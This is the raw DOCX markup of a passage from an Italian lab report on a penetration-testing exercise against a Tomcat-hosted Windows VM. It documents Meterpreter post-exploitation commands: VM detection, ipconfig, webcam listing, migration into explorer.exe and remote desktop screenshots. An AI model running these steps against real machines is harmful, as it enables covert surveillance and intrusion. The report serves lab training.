        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Il modulo checkvm verifica se il sistema è virtualizzato:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="100" w:type="pct"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="1f6feb" w:sz="12" w:space="0"/>
          <w:bottom w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:insideH w:val="none" w:sz="4" w:space="0"/>
          <w:insideV w:val="none" w:sz="4" w:space="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2988"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100010000000"/>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="f2f3f5"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000005F">
            <w:pPr>
              <w:spacing w:beforeAutospacing="0" w:after="20" w:afterAutospacing="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b4f72"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>run post/windows/gather/checkvm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00000060">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Risultato: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">il target è una macchina virtuale </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Qemu/KVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (coerente con l'ambiente UTM/QEMU su cui gira il laboratorio).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000061">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="100" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1f6feb"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Evidenza 2 — Impostazioni di rete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000062">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Il comando ipconfig elenca le interfacce di rete del target. Quella reale è il Red Hat VirtIO Ethernet Adapter:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="100" w:type="pct"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="1f6feb" w:sz="12" w:space="0"/>
          <w:bottom w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:insideH w:val="none" w:sz="4" w:space="0"/>
          <w:insideV w:val="none" w:sz="4" w:space="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1010"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100010000000"/>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="f2f3f5"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000063">
            <w:pPr>
              <w:spacing w:beforeAutospacing="0" w:after="20" w:afterAutospacing="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b4f72"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ipconfig</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00000064">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0" w:line="264"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Indirizzo IPv4: 192.168.200.200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000065">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0" w:line="264"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Maschera di rete: 255.255.255.0 (una rete /24)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000066">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0" w:line="264"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MAC address: 0a:cf:10:76:09:9b — identico a quello visto con nmap, a conferma che siamo sulla macchina corretta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000067">
      <w:pPr>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="40" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="3467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22"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3467100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000068">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="200" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figura 5 — Output di checkvm ("This is a Qemu/KVM Virtual Machine") e di ipconfig con i dati di rete del target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000069">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="100" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1f6feb"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Evidenza 3 — Webcam attive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000006A">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Il comando webcam_list elenca le webcam disponibili sul target:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="100" w:type="pct"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="1f6feb" w:sz="12" w:space="0"/>
          <w:bottom w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:insideH w:val="none" w:sz="4" w:space="0"/>
          <w:insideV w:val="none" w:sz="4" w:space="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1421"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100010000000"/>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="f2f3f5"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000006B">
            <w:pPr>
              <w:spacing w:beforeAutospacing="0" w:after="20" w:afterAutospacing="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b4f72"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>webcam_list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0000006C">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Risultato: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"No webcams were found" — il target non ha webcam a disposizione. Anche l'assenza è un'evidenza valida da riportare.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000006D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="100" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1f6feb"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Evidenza 4 — Screenshot del desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000006E">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Al primo tentativo il comando screenshot fallisce con un errore: la sessione è agganciata a un processo di servizio (Tomcat, in sessione 0) che non "vede" il desktop dell'utente. Serve quindi migrare in un processo che gira nella sessione desktop dell'utente loggato.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000006F">
      <w:pPr>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="40" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="2733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23"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="2733675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000070">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="200" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figura 6 — webcam_list non trova webcam; screenshot fallisce perché la sessione non è agganciata al desktop interattivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000071">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Con ps si elencano i processi. Si cerca un processo in Session 1 con un utente reale: explorer.exe (PID 2312, utente DESKTOP-9K1O4BT\user) è il candidato ideale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000072">
      <w:pPr>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="40" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="3467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24"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3467100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000073">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="200" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figura 7 — Elenco processi (ps): explorer.exe (PID 2312) gira nella sessione desktop 1 dell'utente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000074">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Si migra nel processo e si ripete la cattura:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="100" w:type="pct"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="1f6feb" w:sz="12" w:space="0"/>
          <w:bottom w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:insideH w:val="none" w:sz="4" w:space="0"/>
          <w:insideV w:val="none" w:sz="4" w:space="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1299"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100010000000"/>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="f2f3f5"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000075">
            <w:pPr>
              <w:spacing w:beforeAutospacing="0" w:after="20" w:afterAutospacing="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b4f72"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>migrate 2312</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00000076">
            <w:pPr>
              <w:spacing w:beforeAutospacing="0" w:after="20" w:afterAutospacing="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b4f72"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>screenshot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00000077">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Questa volta la migrazione va a buon fine e lo screenshot viene salvato su Kali (/home/kali/tIZGLBqM.jpeg). L'immagine mostra il desktop del target con Chrome aperto sulla pagina di Tomcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000078">
      <w:pPr>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="40" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="3467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25"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3467100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000079">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="200" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figura 8 — Screenshot del desktop del target catturato da remoto, aperto su Kali.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000007A">
      <w:r>
        <w:rPr/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000007B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:beforeAutospacing="0" w:after="140" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1a1a2e"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>6. Riepilogo ed esito</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000007C">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tutte le fasi dell'esercizio sono state completate con successo. Di seguito il quadro sintetico delle evidenze raccolte.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="100" w:type="pct"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:left w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:right w:val="single" w:color="d5d8dc" w:sz="4" w:space="0"/>
          <w:insideH w:val="single" w:color="e5e7e9" w:sz="4" w:space="0"/>
          <w:insideV w:val="single" w:color="e5e7e9" w:sz="4" w:space="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1336"/>
        <w:gridCol w:w="2023"/>
        <w:gridCol w:w="664"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100010000000"/>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1f6feb"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000007D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Richiesta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100001000000"/>
            <w:tcW w:w="4560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1f6feb"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000007E">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Risultato</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100010000000"/>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1f6feb"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000007F">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Esito</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="f7f9fb"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000080">
            <w:r>
              <w:rPr>
                <w:b w:val="off"/>
                <w:bCs w:val="off"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Servizio bersaglio avviato</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="4560" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="f7f9fb"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000081">
            <w:r>
              <w:rPr>
                <w:b w:val="off"/>
                <w:bCs w:val="off"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Apache Tomcat 7.0.81 su porta 8080</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="f7f9fb"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000082">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1e8449"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>OK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
